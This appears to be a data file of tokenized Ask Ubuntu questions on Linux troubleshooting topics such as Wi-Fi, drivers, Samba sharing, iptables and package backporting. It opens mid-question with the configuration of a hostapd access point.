on sat nov 30 16:08:41 2013 *filter : input accept [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 0:0 ] -a forward -s 192.168.* . */24 -o wlan0 -j accept -a forward -d 192.168.* . */24 -i wlan0 -m conntrack -- ctstate related , established -j accept commit # completed on sat nov 30 16:08:41 2013 # generated by iptables-save v1.4.12 on sat nov 30 16:08:41 2013 *nat : prerouting accept [ 0:0 ] : input accept [ 0:0 ] : output accept [ 2:333 ] : postrouting accept [ 2:333 ] -a postrouting -s 192.168.* . */24 -o wlan0 -j masquerade commit # completed on sat nov 30 16:08:41 201 apstart.sh ( start script . runs at system boot , or manually ) # ! /bin/bash # start # configure ip address for wlan sudo ifconfig wlan1 192.168.* . * # start dhcp/dns server sudo service dnsmasq restart # enable routing sudo sysctl net.ipv4.ip_forward=1 # enable nat # run access point daemon sudo hostapd /etc/hostapd.conf # stop # disable nat sudo iptables -d postrouting -t nat -o wlan0 -j masquerade # disable routing sudo sysctl net.ipv4.ip_forward=0 # disable dhcp/dns server sudo service dnsmasq stop sudo service hostapd stop some terminal command outputs from within the hostapd box : output : host amazon.com amazon.com has address 205.251.242.54 amazon.com has address 72.21.194.212 amazon.com has address 72.21.215.232 amazon.com has address 176.32.98.166 amazon.com mail is handled by 5 amazon-smtp.amazon.com . output : traceroute amazon.com ( 192.168.1.1 is the remote wifi router via wlan0 ) traceroute to amazon.com ( 72.21.194.212 ) , 30 hops max , 60 byte packets 1 192.168.1.1 ( 192.168.1.1 ) 4.137 ms 4.270 ms 6.582 ms 2 192.168.0.1 ( 192.168.0.1 ) 22.555 ms 22.773 ms 22.995 ms 3 blng-dsl-gw16.blng.qwest.net ( 67.42.227.16 ) 74.420 ms 74.481 ms 75.151 ms 4 blng-agw1.inet.qwest.net ( 65.100.79.121 ) 39.057 ms 40.915 ms 43.690 ms 5 dca2-edge-01.inet.qwest.net ( 67.14.28.110 ) 105.108 ms 106.398 ms 108.563 ms 6 65.120.78.82 ( 65.120.78.82 ) 107.699 ms 87.128 ms 91.314 ms 7 72.21.220.121 ( 72.21.220.121 ) 91.507 ms 91.612 ms 72.21.220.153 ( 72.21.220.153 ) 91.723 ms 8 72.21.222.139 ( 72.21.222.139 ) 92.965 ms 94.833 ms 96.127 ms 9 * * * 10 * * * 11 * * * 12 * * * 13 * * 205.251.248.11 ( 205.251.248.11 ) 95.998 ms 14 * * * 15 * * * 16 * * * 17 * * * 18 * * * 19 * * * 20 * * * 21 * * * 22 * * * 23 * * * 24 * * * 25 * * * 26 * * * 27 * * * 28 * * * 29 * * * 30 * * * output : host imdb.com imdb.com has address 72.21.202.149 imdb.com has address 72.21.210.29 imdb.com has address 72.21.206.80 imdb.com mail is handled by 10 smtp-fw-31001.amazon.com . imdb.com mail is handled by 10 smtp-fw-33001.amazon.com . imdb.com mail is handled by 10 smtp-fw-4101.amazon.com . imdb.com mail is handled by 10 smtp-fw-2101.amazon.com . imdb.com mail is handled by 10 smtp-fw-9101.amazon.com . output : host google.com google.com has address 74.125.225.174 google.com has address 74.125.225.165 google.com has address 74.125.225.162 google.com has address 74.125.225.168 google.com has address 74.125.225.163 google.com has address 74.125.225.161 google.com has address 74.125.225.169 google.com has address 74.125.225.167 google.com has address 74.125.225.166 google.com has address 74.125.225.160 google.com has address 74.125.225.164 google.com has ipv6 address 2607 : f8b0:400f:800 : :1002 google.com mail is handled by 20 alt1.aspmx.l.google.com . google.com mail is handled by 30 alt2.aspmx.l.google.com . google.com mail is handled by 50 alt4.aspmx.l.google.com . google.com mail is handled by 10 aspmx.l.google.com . google.com mail is handled by 40 alt3.aspmx.l.google.com . output : host startpage.com startpage.com has address 69.90.210.119 startpage.com mail is handled by 10 mail.startpage.com .
391361	hp deskjet 1010 printers drivers for ubuntu 12.04	i ca n't installs drivers from hp site . i ca n't install hp lip 3.13.11 run . i do n't find support tech and ca n't run the hp cd printer drivers on my computer with ubuntu 12.04 .
391364	can i burn my own installation dvd on another computer	can i burn my own installation dvd on another computer to install ubuntu on a newly buildt computer ?
391367	can i restore gpt info from mbr ?	i had a problem where my ubuntu installer would not recognize my windows partition , so i looked it up , and someone suggested 'zapping ' gpt from my hdd with sudo gdisc /dev/sdb followed by x , z , y , n. ( expert mode , zap gpt , yes to remove gpt , no to wipe mbr ) . this , it was explained would fix my problem , but saying no to wiping mbr would mean my windows partition was n't lost . which then turned out not to be the case , so i 'm not finding my os anymore , and being a retard i did n't do any backups or anything like that . is all hope lost for me ? or is there some way to restore the gp tables ? i 'm pretty horrible with partitions .
391368	i can not access thunderbird ppa	i tried the suggestion given to this question : thunderbird wo n't send email but apt gave the following error : can not access ppa ( https : //launchpad.net/api/1.0/~mozillateam/+archive/thunderbird-stable ) to get ppa information , please check your internet connection . of course , because i can post this , my internet connection is fine . any suggestions ? ubuntu 12.04 lts . thanks .
391369	ssh and telnet connection refused	if i am trying to ssh or telnet to an ubuntu server , and both connections are rejected or refused ! i can ping the server , firewall off . what are troubleshooting steps should i take ? ( i am far away from the server , so console solution is n't available ) .
391381	installing nvidia drivers on dell xps 14z	i have had the hardest time trying to install nvidia drivers for my dell xps 14z . i have followed several bits of instructions here and on other communities but i seem to run into the same problem . when i install a set of drivers mostly the nvidia-current or even bumble bee nothing works . with nvidia-current when i login its just a black screen , i have been able to fix that . bumble bee didnt do anything for me . i am just trying to get enough support to run metro : last light . here is the output of my lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf119m [ geforce gt 520m ] ( rev ff ) 07:00.0 ethernet controller : qualcomm atheros ar8151 v2.0 gigabit ethernet ( rev c0 ) 08:00.0 network controller : intel corporation centrino advanced-n 6230 [ rainbow peak ] ( rev 34 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) 0f:00.0 usb controller : texas instruments tusb73x0 superspeed usb 3.0 xhci host controller ( rev 02 ) what can i do/ or can i get this to work ?
391386	computer is not detecting any wireless signal	i have recently acquired a new laptop , and my old laptop was too old to sell for any significant value . i decided to put the eight gigs to use on my old laptop and installed 12.04 on an eight gig dvd . i successfully ran ubuntu on the computer , but i could not connect to my wireless internet connection . when clicking on the top-right network symbol , it says `` no network devices available '' . when typing iwconfig into terminal , the result is lo no wireless extensions . with sudo lshw -c network , the result is *-network description : network controller product : bcm4311 802.11a/b/g vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:17 memory : fe8fc000-fe8fffff my new laptop can connect to my router wirelessly perfectly . i have connected my raspberry pi to my laptop through connecting my pi to my computer with an ethernet cable . i am prepared to do the same with this new laptop as it is right next to it . i am not willing to , however , connect my laptop to the router .
391387	the shell/terminal does not allow/show my password	i am trying to install gfortran from a shell/terminal , i write sudo apt-get install gfortran and then in the next line appears sudo password from romulo . but when i try to write the password the letters of the password does not appear in the shell , i ca n't write any letter . this occurs when i try to install any program . what can i do ?
391388	how to install ubuntu on a partition other than windows partition	i have windows 7 professional 32bit installed on my local disk ( c : ) and i want ubuntu 13.10 to be installed in local disk ( e : ) which i have a lot of free space in . i have the live cd . can someone please help me with this issue ?
391389	how can i watch videos online ?	what app do i need to download in order to watch video 's online ? something similar to flash program but for ubuntu ? ( first time ubuntu user ) thank you very much !
391392	boot ubuntu 12.04 lts from flashdrive	i recently downloaded ubuntu 12.04 lts on a flashdrive to try linux out and installed the file and used the universal usb installer to install that file onto my flashdrive . after changing the boot sequence on my laptop , i got a screen asking me for what language i wanted so i clicked english , but after that it just gave be a black screen and i can type stuff on it . i rebooted my laptop and i got the black screen again , not the ubuntu interface . am i doing anything wrong here while trying to boot up from my flashdrive , because i really want to give linux a try ! any help would be appreciated on this ! edit : the question that my question appears to be similar to asks for where to get the iso file , not why i 'm getting a black screen every time i boot up from my pendrive . i have the iso downloaded from unetbootin on my flashdrive and my boot sequence changed in my bios settings , but every time i boot up ubuntu , i get a purple screen and then i get a black screen and i can type words , numbers , etc on it .
391397	13.10 , how do you install a game or app from cd using wine 1.6 ?	using ubuntu 13.10 and using wine 1.6. i am trying to install a game ( really old game ) from a cd , so i use wine to open the top most exe file in the cd 's directory . during installation the program cant find the cd to get more files . basicly what im asking it . can you mount a cd inside wine ?
391398	tunnel a whole desktop over ssh to x11 running on osx	my main workstation is osx ( as i spend a lot of time developing ios and osx software ) , however i use ubuntu for a bunch of things . i 've got ubuntu running on another machine , and would like to tunnel the desktop over ssh to osx . i 'm an 1000mbit ethernet . it works for the following : ssh -x user @ server.mydomain nautilus & # or firefox , etc - will open the window on my osx machine however for a whole desktop : gnome-session & it gives the error message `` we failed but the fail whale is dead '' . . . this has to be the most fantastic error message ever ( although it does n't help me very much in explaining what went wrong ) .
391401	writer feature for interweaving the lines of multiple paragraphs . ie : musical or theatrical composition	doable in libre office ? does n't need to take solid paragraphs and interweave them.just need to set it up . so it does it as i type them . the problem with manually doing it is every time i edit the text or change the font size it throws off the lines and i have to start all over again . i 'm sure there is lots of applications , all i can think of is in music where people are singing different words at the same time or a play-script where multiple conversations are going on at once or if you wanted to put non verbal cues underneath . example : paragraph 1 line 1 paragraph 2 line 1 paragraph 1 line 2 paragraph 2 line 2 editing : paragraph 1 line 1 if this line get too long it skips the next line and ... . paragraph 2 line 1 ... .keeps going here . ( paragraph 1 line 2 ) paragraph 2 line 2
391402	how can i make a script that kills any frozen client ( process ) ?	i am running around 10 macro clients at the same time on my server . occasionally one of the clients will freeze and grey out ( turns completely grey ) , meaning i have to kill it and restart another instance of the client . sometimes i try to ps aux and guess which client it is but i am not really sure , i just assume the highest time is the one but sometimes it doesnât work out and i end up killing one of the fine clients ( using kill -9 < processnumber > ) . i am looking for a script that can simply detect the frozen client and close it without closing any of the other ones that are working . it would be nice if i can specify the number of frozen clients for it to look for . for example , say 2 out of the 10 clients are frozen and greyed , i would add perhaps 2 as the argument to the bash script ? currently when i type ps aux into command line , this is what `` command '' i am looking for , and then kill the process id corresponding to it : java -xss2m -xm this command never changed , this is always it . how can i make this script ? thank you for any help .
391403	how long should wubi take to install lubuntu ?	i tried installing ubuntu with wubi but it took too long on one file . i 'm installing it with 18gb on a 64gb flash drive . it was an amd64.iso . torrent thing . so i tried installing lubuntu instead and everything else took shorter to install but its stuck on the .iso torrent again . how long should it take and am i doing something wrong ? i am using windows 7 and letting wubi do it for me . i 'm not so good with computers .
391411	how to download software from the ubuntu app directory ?	i do n't want to use sudo apt-get 'softwarename ' to install software on a ubuntu machine . instead i want to go to https : //apps.ubuntu.com search for the software then download and install it later like windows . so , how to download software from ubuntu app directory ?
391412	failed to install via usb ( grub didnt install )	hey i´m getting this error when trying to instal ubuntu 12.04 via an usb bootable drive i´ve made with the steps provided on the ubuntu download page . this is what it says ( well kind of , because i´m trying to install it in spanish ) < < grub-efi-amd64-signed > > package coul not be installed on < < /target/ > > . the installed system would not be started with out the loader engine of grub . i´m trying to side install it on windows 8.1 sony vaio 14 fit ; intel core i5 i´ve disabled the secure boot and rapid wake or fast wake in order to run the boot from the usb drive . dont really know what to do because i´m kinda new on this and really want to know if there´s something i am leaving behind in order to complete the install process . how to do it ?
391413	how much swap space should i configure ?	how much swap space should i have ? i have a 500gb hdd and 6gb ram . my specs : release 12.04 ( precise ) 64-bit kernel linux 3.8.0-34-generic gnome 3.4.2 memory : 5.7 gib processor : intel® core™ i3-3227u cpu @ 1.90ghz × 4 i just want to run steam games smoothly .
391416	is signal handling in qtquick asynchronous ?	i have the following qml document : item { id : item mousearea { onclicked : { /* emit signal */ item.somesignal ( ) ; } } ... } when i click the item , the signal handler is called like any other function - the onclicked handler completes and returns only after somesignal has been handled . my question is : how can i cause a signal handler to start executing only after the function where the signal is emitted has completed execution ? what is the correct way of emitting/handling signals ?
391418	remove copy.com cloud client	i tried copy.com cloud client on my lubuntu . i ca n't find any instructions how to remove it . any idea ? maybe this instructions for installation will helps someone : https : //copy.zendesk.com/entries/24061068-how-do-i-install-copy-for-linux-
391419	ubuntu will not load , file missing	i burnt the dvd and verified the disk then installed ubuntu on winndows 8.1 . but i get an error message saying : 'file missing ubuntu\winboot\wubildr\.mbr' it then asks me to choose the os , but when i select ubuntu the error message reappears . windows will load if i select it , but no luck with ubuntu . how to fix this ?
391420	unity theme does n't come by default	i am using ubuntu 12.04lts , everytime i login to ubuntu sidebar and upside bar does n't appear . i have to open terminal via ctrl+alt+t . then should enter `` unity '' in it , then the bars appear . what should i do so that it appears by default ? earlier i install xfce theme for windows 7 look which is not completely deleted .
391423	how can i give multiple users equal access/ownership to the same samba share ?	i 'm starting to pull my hair out ( and i do n't have much left unfortunately ) . my setup is the following . i have ubuntu server 12.04lts running on a box in my office which has the following smb share : [ galactica ] comment=galactica path=/mnt/galactica browsable=yes writeable=yes guest ok=yes read only=no create mask=0777 follow symlinks=yes directory mask=0777 i have a desktop machine in the family room that my wife and i use ( each with separate accounts ) , which is currently running ubuntu client 13.10 . i 've configured the fstab to auto-mount the samba share automatically at boot : //192.168.1.118/galactica /media/galactica cifs guest , _netdev , iocharset=utf8 , gid=1002 , uid=1000 0 0 the gid is a group that has both our user accounts in it ( me + wife ) . the uid is my user account . all of this works just fine in my user account . when my wife is using the share drive , she is able to create directories with no issue , however the problem arises when she attempts to create files . when she copies or creates files in the share , the icons show up with a little lock in the lower right hand corner . when looking at the permissions for these files , it appears that my user owns the file and she has only read permissions ( group and other have read permission as well ) . i 've tried many , many different fstab configurations , but nothing seems to help . ( including adding her uid , noperm , umask , dmask , fmask , etc . ) help me internet ! you are my only hope .
391425	ubuntu vps > restrict openerp for some user	in ubuntu vps server , openerp is running and anyone can using this web interface . my vps server is : http : // < public ip > :8069/ . i want to allow some mac addresses and restrict to all . here is my iptables file : iptables -a input -p tcp -- match multiport -- dports 80,8069 -m mac -- mac-source e0 : ca:94 : a7 : c2:80 -j accept iptables -a input -p tcp -- match multiport -- dports 80,8069 -m mac -- mac-source 4c:72 : b9:0d : d5 : b7 -j accept iptables -a input -p tcp -- match multiport -- dports 80,8069 -j drop but it 's not work . would you please anyone help me . what should i do ?
391426	is /razorqt/ available for saucy as a desktop environment ?	found out and started to fall in love for razor qt all over again . is it available for 13.10 ? if so , how do i install ? guess , you can put that under 'not added-yet ' . by this guy , apparently .
391429	what is remmina 's `` remotefx '' secret to running any sort of application remotely ?	i am attempting to run an opengl application from a remote pc . both pc 's are on intranet ( so gbit connection ) and both are running ubuntu 13.04 . if i share the desktop of the pc running this opengl application , and connect to it with remmina 's remotefx option , i can indeed -to my surprise- run this application . trying the same using tightvnc fails , because the application says it can not use some gl extensions.. trying with ssh -y also fails for the same reason . so , what is the big picture ( and the finer details ) that make remotefx possible ? is it possible to enable something from command line , and enable this functionality for other x forwarding applications ( like ssh -y , nx , other vnc servers etc ) . thank you
391431	what are the formats of audio files which rhythmbox supports ?	my rythmbox in ubuntu 13.04 is not playing mp3 files .
391432	issue backporting sqlite 3.8.1 to ubuntu precise from trusty	i 'm pretty new to all of the packaging of ubuntu applications and what not so this may not be the correct place to ask this question or there may be a more appropriate place to re-ask this question . i'de be happy for redirection if that is indeed the case . i 'm looking to backport 3.8.1-1ubuntu3 to work on precise . i followed the instructions to do so from http : //architects.dzone.com/articles/how-backport-packages-ubuntu and they worked perfectly except it seems there 's some dependency issue that prevents it building properly . you can see the full build log at the following site . https : //launchpad.net/~peter64/+archive/ppa/+build/5342072 ( amd64 build ) it was too long to include with this question . the part that fails is the following . ... tcl8.4 : already deinstalled tcl8.4-dev : already deinstalled checking for source dependency conflicts ... /usr/bin/sudo /usr/bin/apt-get -- purge $ chroot_options -q -y install debhelper autoconf libtool automake autotools-dev chrpath libreadline-dev tcl8.5-dev dh-autoreconf reading package lists ... building dependency tree ... reading state information ... the following extra packages will be installed : bsdmainutils dh-apparmor file gettext gettext-base groff-base html2text intltool-debian libcroco3 libgettextpo0 libmagic1 libpipeline1 libreadline6-dev libtinfo-dev libunistring0 libxml2 m4 man-db po-debconf tcl8.5 suggested packages : autoconf2.13 autoconf-archive gnu-standards autoconf-doc wamerican wordlist whois vacation dh-make gettext-doc groff libtool-doc automaken gfortran fortran95-compiler gcj less www-browser libmail-box-perl tclreadline tcl8.5-doc recommended packages : autopoint curl wget lynx-cur libltdl-dev xml-core libmail-sendmail-perl the following new packages will be installed : autoconf automake autotools-dev bsdmainutils chrpath debhelper dh-apparmor dh-autoreconf file gettext gettext-base groff-base html2text intltool-debian libcroco3 libgettextpo0 libmagic1 libpipeline1 libreadline-dev libreadline6-dev libtinfo-dev libtool libunistring0 libxml2 m4 man-db po-debconf tcl8.5 tcl8.5-dev 0 upgraded , 29 newly installed , 0 to remove and 0 not upgraded . ... ./configure -- prefix=/usr -- mandir= '' /usr/share/man '' \ -- build x86_64-linux-gnu -- with-tcl=/usr/lib/x86_64-linux-gnu/tcl8.5 -- enable-threadsafe \ -- enable-load-extension \ -- libdir=\ $ { prefix } /lib/x86_64-linux-gnu \ -- libexecdir=\ $ { libdir } /sqlite3 \ tcllibdir=/usr/lib/tcltk/sqlite3 \ `if ( echo | grep -q debug ) then echo `` -- enable-debug '' ; else echo `` '' ; fi` ... checking for tcl configuration ... configure : error : /usr/lib/x86_64-linux-gnu/tcl8.5 directory does n't contain tclconfig.sh make : *** [ configure-stamp ] error 1 it seems like it 's trying to use a version of tcl that is n't available which file do i need to change to make this build seeing as it appears the dependencies are isntructing it to use tcl8.5 properly and the builder is removing the tcl8.4 native to precise before attempting the build . but then it fails to find it . another block of related code that might be of interest is sqlite3_3.8.1-1ubuntu3/debian/rules . ifeq ( $ ( deb_build_gnu_type ) , $ ( deb_host_gnu_type ) ) confflags += -- build $ ( deb_host_gnu_type ) -- with-tcl=/usr/lib/ $ ( deb_host_multiarch ) /tcl8.5 export cross_building=no else confflags += -- build $ ( deb_build_gnu_type ) -- host $ ( deb_host_gnu_type ) -- with-tcl=/usr/lib/ $ ( deb_host_multiarch ) /tcl8.5 ldflags=-l/usr/lib/ $ ( deb_host_multiarch ) export cross_building=yes endif # export deb_cflags_maint_append = -o2 -fno-strict-aliasing export cflags += -o2 -fno-strict-aliasing \ -dsqlite_secure_delete -dsqlite_enable_column_metadata \ -dsqlite_enable_fts3 -dsqlite_enable_rtree=1 -dsqlite_soundex=1 \ -dsqlite_enable_unlock_notify \ -dsqlite_omit_lookaside=1 \ -dsqlite_enable_update_delete_limit=1 \ -dsqlite_max_schema_retry=25 \ -dsqlite_max_variable_number=250000 configure : configure-stamp configure-stamp : dh_testdir dh_autoreconf dh_autotools-dev_updateconfig ./configure -- prefix=/usr -- mandir= '' /usr/share/man '' \ $ ( confflags ) -- enable-threadsafe \ -- enable-load-extension \ -- libdir=\ $ $ { prefix } /lib/ $ ( deb_host_multiarch ) \ -- libexecdir=\ $ $ { libdir } /sqlite3 \ tcllibdir=/usr/lib/tcltk/sqlite3 \ $ ( ddebug ) # remove double -ldl from sqlite3.pc sed -i `` s/\ ( [ -ldl .+ ] \ ) -ldl/\1/ '' sqlite3.pc touch $ @ looking at the precise version of the library 3.7.9-2ubuntu1.1/debian/rules it appears as if the line . confflags += -- build $ ( deb_host_gnu_type ) -- with-tcl=/usr/lib/ $ ( deb_host_multiarch ) /tcl8.5 needs to be changed back to confflags += -- build $ ( deb_host_gnu_type ) -- with-tcl=/usr/lib/tcl8.5 based on the fact the older precise file contains ifeq ( $ ( deb_build_gnu_type ) , $ ( deb_host_gnu_type ) ) confflags += -- build $ ( deb_host_gnu_type ) -- with-tcl=/usr/lib/tcl8.5 export cross_building=no else confflags += -- build $ ( deb_build_gnu_type ) -- host $ ( deb_host_gnu_type ) -- with-tcl=/usr/ $ ( deb_host_gnu_type ) /lib/tcl8.5 ldflags=-l/usr/ $ ( deb_host_gnu_type ) /lib export cross_building=yes endif having used backportpackage ( which automates the whole process ) to do the original build i 'm not sure if 1 ) the above fix will really resolve the issue . 2 ) how to apply the above fix to the single file , re-tar it and submit it all as a backport for approval . any guidance about how to get this done would be appreciated . if you need any further information please do n't hestitate to ask and i will provide it . thanks !
391434	ubuntu 12.04 installation input/output error	i have been trying to install ubuntu 12.04 on my system since tomorrow , i know there newer versions of ubuntu available , but still i want to install this version only . i 'm repeatedly getting the same error when i try to install ubuntu on my system . i checked the md5 hash of the iso file i downloaded but it is correct . i 'm installing ubuntu from my usb drive . please help me out , i need an os to be installed on my pc . because i do n't have one .
391435	remember ubuntu password but ask for sudo confirmation	when i 'm done with making ubuntu remember my password and do not ask for it before risky actions ... is there a way to get safe pop up confirmation window ( without password input , just ok or cancel ) ? so i will know when a pesky program runs a risky action that i do n't want to proceed ? or it is not developed since the program could just simulate a click on ok anyway ?
391438	ubuntu is showing graphics problem and no booting after that	when i install ubuntu-12.04.2-desktop-i386 it showed graphics problem then i choose low graphics for one session and pressed ctrl+alt+f7 , and now following screen appears and no more process . what to do now ?
391439	how can i set up pycharm to launch from the launcher ?	i have installed pycharm on my brand new ubuntu 13.10 laptop . to launch pycharm , i find i must navigate to the directory that pycharm lives in , and execute it from there as such : cd home/matt/software/pycharm/bin sh pycharm.sh i hope this is n't asking too much , but i would like to be able to click on an icon in the launcher to launch this application . i tried right-clicking on the pycharm icon in the launcher when the app is running and selecting `` lock to launcher '' but this does n't work ( after pinning , when i try to run the software this way , the icon throbs in a very awkward manner a few times and does nothing ) . a small app called alacart was rumoured to be useful , but i have no idea how it works , and it appears useless . i 'm not sure why the authors teased us with a `` help '' button if there are no help files written for us to view . further attempt has included reading page after page of technical documentation on how to write scripts that will somehow help me customize my experience . how can i set up pycharm to launch from the launcher ? ? ?
391443	ubuntu for micromax canvas 2 a110	i wanted to know if i can put ubuntu into a rooted phone with the following specs : - > dual core - > 1ghz processor - > 512mb ram
391445	maas nodes login incorrect	i 'm testing ubuntu12.04 maas with juju , i installed the maas server and add 2 nodes now the nodes allocated to admin user when i start them login is required i tried the admin username and password but always got error `` login incorrect '' any one can help me please
391446	how do i install a perl module in ubuntu 12.04 ?	i need to use package list : :compare . i have downloaded compare.pm which says use list : :compare : :base : :_auxiliary qw ( _validate_2_seenhashes _chart_engine_regular ) ; what all do i need to install , and how do i install it/them ?
391447	dualboot ubuntu and mac os x mountain lion	i would like help on how to dual boot mountain lion 10.8 . i already have free allocated space for the install . would it break my ubuntu ? i 'm currently running ubuntu 12.04 ( precise ) .
391452	access winxp share folder from ubuntu 12.04	i 'm unable to access a shared folder from ubuntu 12.04 the folder is located on a winxp machine , it is shared and can be accessed from another windows machine on the network . what i have done since now is this now i can see the winxp host name in nautilus , but when i click on it , it retrieves the error msg : `` unable to mount location - failed to retrieve share list from server '' edit : i have also changed the `` workgroup '' to be in the same as the winxp ... what else need to be done ? thanks
391455	interface configuration	my os is ubuntu server 13.10 64-bit on vmware with host windows 7 i try static config ethx but when check /etc/network/interfaces , this file is my config and next reboot i have to again set config ethx . please help me , thanks .
391457	bootable usb , windows from ubuntu	what about creating a bootable usb , on which i would like to put windows 7 , with ubuntu ? does any possibility exist ?
391460	how can i properly remove xtest from my ubuntu ?	for some reason xtest is making my mouse not being able to click at all so i have to run xinput set-prop 4 `` device enabled '' 0 every time i log into my user . is there a way i can just get rid of xtest from my ubuntu or how can i run that script before i login so i do n't have to manually run it every time i login ?
391465	how to start dconf and gconf in a non-gnome environment ?	i am running openbox without any de . and i also use some qt apps such as vlc , virtualbox and skype . however , they require some gconf / dconf settings to be set . for instance to set the correct icon theme : $ gconftool-2 -- set -- type string /desktop/gnome/interface/icon_theme faenza when running gnome , these settings are loaded and used by the qt apps . however , when running native openbox , these settings are ignored and i presume that this is due to some gconf / dconf services not being loaded when running openbox without gnome . therefore my question , how can i run gconf / dconf without gnome to have my qt apps having access to the relevant gconf / dconf settings ?
391472	force feedback not working - logitech dfgt	i 'm trying to get force feedback working again on my logitech dfgt steering wheel . previously it worked fine , but iracing does n't appear to be able to make it work after updating . i 'm running ubuntu 13.10 with kernel 3.12.0-031200-generic . i 've tried fftest and , after finding the right event number , force feedback appears to be working as shown below . force feedback test program . hold firmly your wheel or joystick to prevent damages device /dev/input/event2 opened features : * absolute axes : x , y , z , hat 0 x , hat 0 y , [ 07 00 03 00 00 00 00 00 ] * relative axes : [ 00 00 ] * force feedback effects types : constant , gain , autocenter , force feedback periodic effects : [ 00 00 00 00 00 00 00 00 00 00 04 00 03 00 00 00 ] * number of simultaneous effects : 16 setting master gain to 75 % ... ok uploading effect # 0 ( periodic sinusoidal ) ... error : : invalid argument uploading effect # 1 ( constant ) ... ok ( id 0 ) uploading effect # 2 ( spring ) ... error : invalid argument uploading effect # 3 ( damper ) ... error : invalid argument uploading effect # 4 ( strong rumble , with heavy motor ) ... error : invalid argument uploading effect # 5 ( weak rumble , with light motor ) ... error : invalid argument enter effect number , -1 to exit 1 now playing : constant force force feedback also appears to be enabled when looking at /usr/src/linux-headers-3.12.0-031200/drivers/hid/kconfig as shown below . config logitech_ff bool `` logitech force feedback support '' depends on hid_logitech select input_ff_memless help say y here if you have one of these devices : - logitech wingman cordless rumblepad - logitech wingman cordless rumblepad 2 - logitech wingman force 3d - logitech formula force ex - logitech wingman formula force gp - logitech momo force wheel and if you want to enable force feedback for them . note : if you say n here , this device will still be supported , but without force feedback . config logiwheels_ff bool `` logitech wheels configuration and force feedback support '' depends on hid_logitech select input_ff_memless default logitech_ff help say y here if you want to enable force feedback and range setting support for following logitech wheels : - logitech driving force - logitech driving force pro - logitech driving force gt - logitech g25 - logitech g27 - logitech momo/momo 2 - logitech formula force ex yet opening a game such as iracing that supports force feedback still wo n't let me enable it in the settings . i 'm not sure what to check next . force feedback was working just fine a few weeks ago , so i will test rolling back kernels to see if that affects anything . in the mean time , any help or ideas would be greatly appreciated ! thank you .
391473	using windows drivers in wine	can wine be used to overcome printer driver problems ? i have tried mint15 and 16 64 and 32 bit distributions but can not find a means of running my canon mg6150 . if wine runs windows software then how do i make it run my printer with windows xp drivers from within linux using libre office . ?
391474	stop cpu from overheating	when running intensive apps like blender my cpu can get up to 80.c i can manually underclock the cpu from the bios but i would like to have my pc detect when the cpu temp gets too high and slow things down until everything cools down . is there a way to do this automatic or even a manual way to slow the cpu down from ubuntu
391477	no wifi in 12.04 new install	i am a newbie who has just installed 12.04 in my intel i3-550 home built computer . is there supposed to be a gui for wifi ? there is no mention of it in the applications list . my previous computer was a windows os and it had a little icon at the bottom right which one clicked on and it showed networks in the area . is this the way ubuntu works ? right now i am connected over ethernet , but am baffled at how to connect via wifi . i fconfig : eth0 link encap : ethernet hwaddr 48:5b:39:94:28:00 inet addr:192.168.0.143 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :4a5b:39ff : fe94:2800/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1683232 errors:0 dropped:0 overruns:0 frame:0 tx packets:550623 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2246831369 ( 2.2 gb ) tx bytes:86014926 ( 86.0 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:8160 errors:0 dropped:0 overruns:0 frame:0 tx packets:8160 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1194958 ( 1.1 mb ) tx bytes:1194958 ( 1.1 mb ) lspci : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 ide interface : intel corporation 5 series/3400 series chipset 4 port sata ide controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 